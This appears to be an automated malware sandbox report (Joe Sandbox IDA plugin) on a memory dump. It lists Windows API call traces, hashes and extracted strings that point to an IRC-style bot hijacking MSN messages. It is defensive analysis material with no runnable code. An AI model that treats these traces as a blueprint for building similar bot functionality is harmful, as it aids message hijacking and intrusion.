                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Context$FreeSecurity$ApplyBufferControlCredentialsDeleteHandleInitializeToken
                                                                  • String ID:
                                                                  • API String ID: 362823901-0
                                                                  • Opcode ID: 91d4cefd64efd9f35dc6e2e7fd71609d68d9713618f1c362d00826a8ab29d2d4
                                                                  • Instruction ID: 222deea4a56d929cc604ac231cf9f6bd835c40099294d239dd0bdff599dad9c0
                                                                  • Opcode Fuzzy Hash: 91d4cefd64efd9f35dc6e2e7fd71609d68d9713618f1c362d00826a8ab29d2d4
                                                                  • Instruction Fuzzy Hash: B041E6B2C002099BCB11DFAAD885AEFFBFCFF98304F10450BE515A7251D7B5A6448BA4
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                  • ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • ReleaseMutex.KERNEL32(-0000FFFF,?,003D7495), ref: 003D49A5
                                                                  • ReleaseMutex.KERNEL32(003D7495,?,003D7495), ref: 003D49D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 03e03d00c55c86e3f08346e64624f755b73eb8a02ef0a04b17bfb35947deb553
                                                                  • Instruction ID: 774879b5502882f7cb829546dfa968b50194a7cd457289049b977c40c496e372
                                                                  • Opcode Fuzzy Hash: 03e03d00c55c86e3f08346e64624f755b73eb8a02ef0a04b17bfb35947deb553
                                                                  • Instruction Fuzzy Hash: A82121332012468BDB229F66F9A47A777A9EF44364F1A4527E598CB350E730DC51C790
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003D73CC,00407C98,00000000,00000000,00000010,00000000), ref: 003D4A10
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 003D4A77
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000), ref: 003D4AA9
                                                                  • ReleaseMutex.KERNEL32(?,00000000), ref: 003D4ABC
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 19fae008c1d3355fe06379dd5b4b9c663b7e8060e0388ea700377eb7147b0f7b
                                                                  • Instruction ID: ffd71d4d8e88c3e0ef103f4179a7afded8208467eeb158add89af63ab9ec34cf
                                                                  • Opcode Fuzzy Hash: 19fae008c1d3355fe06379dd5b4b9c663b7e8060e0388ea700377eb7147b0f7b
                                                                  • Instruction Fuzzy Hash: 9021A3772042155BDB12DF69FC806AA73ADAF80764B19452BFC48CB350EB30DD4187E4
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 003DD6FD
                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 003DD731
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DD740
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003DD753
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Close$CreateValue
                                                                  • String ID:
                                                                  • API String ID: 1009429713-0
                                                                  • Opcode ID: aa0ebcf9023b687313e33f4e6f6419e67bf2bbed339c76ea2d3e5b6e8402217e
                                                                  • Instruction ID: 8d84dfb25035b07c8a8c8f4df5c59c23d8f27cbee781d791d215bb64bc00250d
                                                                  • Opcode Fuzzy Hash: aa0ebcf9023b687313e33f4e6f6419e67bf2bbed339c76ea2d3e5b6e8402217e
                                                                  • Instruction Fuzzy Hash: 13211D75640209BBDB25CF94DC86FAA737CEB88B44F108244BA05AB285E670FE4497A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLocal$closesocket
                                                                  • String ID:
                                                                  • API String ID: 1824021853-0
                                                                  • Opcode ID: 811a052fccb4a2c7277ff8bf255115bb4af3e452b279823391bdb9bb3d32fc52
                                                                  • Instruction ID: 547f32737c9eabcfc03f7655997c600c7525a5753d0ba4d0d4971eb174e2db3e
                                                                  • Opcode Fuzzy Hash: 811a052fccb4a2c7277ff8bf255115bb4af3e452b279823391bdb9bb3d32fc52
                                                                  • Instruction Fuzzy Hash: FE015A327042109FC722DF69E88489AB3ADFF8976535504AAF548CB310D631EC81CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: 95a916ab21c3a4c5f4ade448bca9315db80dd00b46d0f3afbf11dcd3c558da99
                                                                  • Instruction ID: 3751e54321707f846cc19ed66b4f70999004c602f770b3dd7b4a62d543db51da
                                                                  • Opcode Fuzzy Hash: 95a916ab21c3a4c5f4ade448bca9315db80dd00b46d0f3afbf11dcd3c558da99
                                                                  • Instruction Fuzzy Hash: 83F044B72002805BD312A3A4EC86A8A735ACBC4361F000426FE098B341E9B9DE4642B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strchr$CountSleepTick
                                                                  • String ID:
                                                                  • API String ID: 735077530-0
                                                                  • Opcode ID: d5175d9d15ba25bc79b7949ee6de8b6821be008fae62708455ee3cb17fb9c87f
                                                                  • Instruction ID: 077423d258067dd62eb5ef008f9d34a365832d691d0c23cee1c6ffa72f48e2e6
                                                                  • Opcode Fuzzy Hash: d5175d9d15ba25bc79b7949ee6de8b6821be008fae62708455ee3cb17fb9c87f
                                                                  • Instruction Fuzzy Hash: 88F02B7350116267C23363A5FC86A8BB79CDB81761F050662FE059F342E56C9E8581F2
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003DA0A2
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 003DA0C0
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DA0CB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DA0D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$CreateWrite
                                                                  • String ID:
                                                                  • API String ID: 3602564925-0
                                                                  • Opcode ID: 22d8b61886b87a830e01c728920a50fdc8c040fe307f2ba66408d6d572892039
                                                                  • Instruction ID: bffdd200ece0db357130af984cceeaa09bb8b769af4e8d727e0d2fddd09671b2
                                                                  • Opcode Fuzzy Hash: 22d8b61886b87a830e01c728920a50fdc8c040fe307f2ba66408d6d572892039
                                                                  • Instruction Fuzzy Hash: 15F06272251218BBEB209B98EC49F9A37ACEB49764F104345FE08DB3C0D6716D0487A5
                                                                  APIs
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrlenA.KERNEL32(00000000,00000000,%s.p10-> Message to %s hijacked!,msn), ref: 003E08B1
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  • Opcode ID: 7164f0d28d32a58bdc0a1155e9582a969a94875bee78ac73b32b97ed0961872d
                                                                  • Instruction ID: 4b93b59b33ebdd88900a91472dd735c4056b830dc042cbe5dec7b8d9457b95fe
                                                                  • Opcode Fuzzy Hash: 7164f0d28d32a58bdc0a1155e9582a969a94875bee78ac73b32b97ed0961872d
                                                                  • Instruction Fuzzy Hash: 27F08977B5512477D72165967C06FFB775CC742721F440252FD08EB281E9E5591002E1
                                                                  APIs
                                                                    • Part of subcall function 003D4900: WaitForSingleObject.KERNEL32(003D7495,000000FF,?,00000000,756F59EB,?,003D7495), ref: 003D4939
                                                                    • Part of subcall function 003D4900: ReleaseMutex.KERNEL32(?,?,003D7495), ref: 003D497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,003D2696), ref: 003E084B
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  • Opcode ID: 026e9d5eae97f4dc181fe0a66b6643652badf54fa5d8b41545f73be696f91352
                                                                  • Instruction ID: 8bfdd59451be3d7223b003824c8217f13994b2610a70153b6f298a40b0a71ef4
                                                                  • Opcode Fuzzy Hash: 026e9d5eae97f4dc181fe0a66b6643652badf54fa5d8b41545f73be696f91352
                                                                  • Instruction Fuzzy Hash: CCF0A772A9513877D62276A57C06FFB734CCB02750F400392FC08EA2C1E9E55A1002E2
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF,00000000), ref: 003DB9AF
                                                                  • EnterCriticalSection.KERNEL32(0041A6C8,?,?,00000000), ref: 003DB9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000,?,?,00000000), ref: 003DB9D1
                                                                    • Part of subcall function 003D8B30: memset.MSVCRT(?,00000000,0000002C), ref: 003D8B6E
                                                                  • LeaveCriticalSection.KERNEL32(0041A6C8,?,?,?,?,?,00000000), ref: 003DB9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  • Opcode ID: d7bd0abc830c41c7233242a8b1df6e781d94e1745e7e552622ae01e1ef7b1e08
                                                                  • Instruction ID: a2b5448014980521db12be9b9002531761972bf22449e8e74cbeb7efca1491ce
                                                                  • Opcode Fuzzy Hash: d7bd0abc830c41c7233242a8b1df6e781d94e1745e7e552622ae01e1ef7b1e08
                                                                  • Instruction Fuzzy Hash: 9FF02BB6D002186FC721EB54DC4AFEA373CEF44714F0442A5FF09A6280E6706A458BA5
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 003DE9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DE9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DE9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 003DE9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  • Opcode ID: 35cf9db4b99066d369870753753d8c73696594d7cd5f1b0fe8b4c058210cd89d
                                                                  • Instruction ID: d16a173858b9c7f2c93da8b63b7953cc17edaa8beede97917cf8f0af3ce791d5
                                                                  • Opcode Fuzzy Hash: 35cf9db4b99066d369870753753d8c73696594d7cd5f1b0fe8b4c058210cd89d
                                                                  • Instruction Fuzzy Hash: 09F0E532241280BBE7335748ACC6F9A775CEB55B61F250216F300AE2E083B42DC086A9
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                    • Part of subcall function 003DB990: memset.MSVCRT(?,00000000,000003FF,00000000), ref: 003DB9AF
                                                                    • Part of subcall function 003DB990: EnterCriticalSection.KERNEL32(0041A6C8,?,?,00000000), ref: 003DB9BC
                                                                    • Part of subcall function 003DB990: wvsprintfA.USER32(00000000,?,00000000,?,?,00000000), ref: 003DB9D1
                                                                    • Part of subcall function 003DB990: LeaveCriticalSection.KERNEL32(0041A6C8,?,?,?,?,?,00000000), ref: 003DB9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  • Opcode ID: bd534779df7b3dff2f78ecaa06ad82968a6eb6db7d458322867536d2f2eb03b7
                                                                  • Instruction ID: 5371e2feafa6e7099e27faa84005ca35ca97dd4ffa2047a96cd6b620ed97881c
                                                                  • Opcode Fuzzy Hash: bd534779df7b3dff2f78ecaa06ad82968a6eb6db7d458322867536d2f2eb03b7
                                                                  • Instruction Fuzzy Hash: C7F096B5900249ABDF11EB54DC45FAA737CFB44704F0081A9F9085B281FB70AA488F91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"=
                                                                  • API String ID: 1594361348-1121072393
                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: c00cc152485c446e76158d36d9bdf46e028dd3ce94080de9f112c61585bf5db7
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 1CD05B366009245B4A11A669F4408D9739CDE9A3747054297FA1CDF7E2C761AD4046D1
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00419E78,00000026,00000001,003DA9CD,?,?,?,?,?,00000000), ref: 003D68BB
                                                                  • PathAppendW.SHLWAPI(00419E78,Internet Explorer\iexplore.exe,?,?,?,?,?,00000000), ref: 003D68D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 003D68C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  • Opcode ID: 511e43a40c4e0e11ba2fa599c1db12fde1527065e1e999db337bfa5b77b54aa7
                                                                  • Instruction ID: a395969fe738daa35dbeabb967f958ecad2bfc347e4bd882bf94ce772fff38b2
                                                                  • Opcode Fuzzy Hash: 511e43a40c4e0e11ba2fa599c1db12fde1527065e1e999db337bfa5b77b54aa7
                                                                  • Instruction Fuzzy Hash: 02C012363C034026EB265A649CDBFC93285A774F82F804612F202EC1D0C3F948C0608B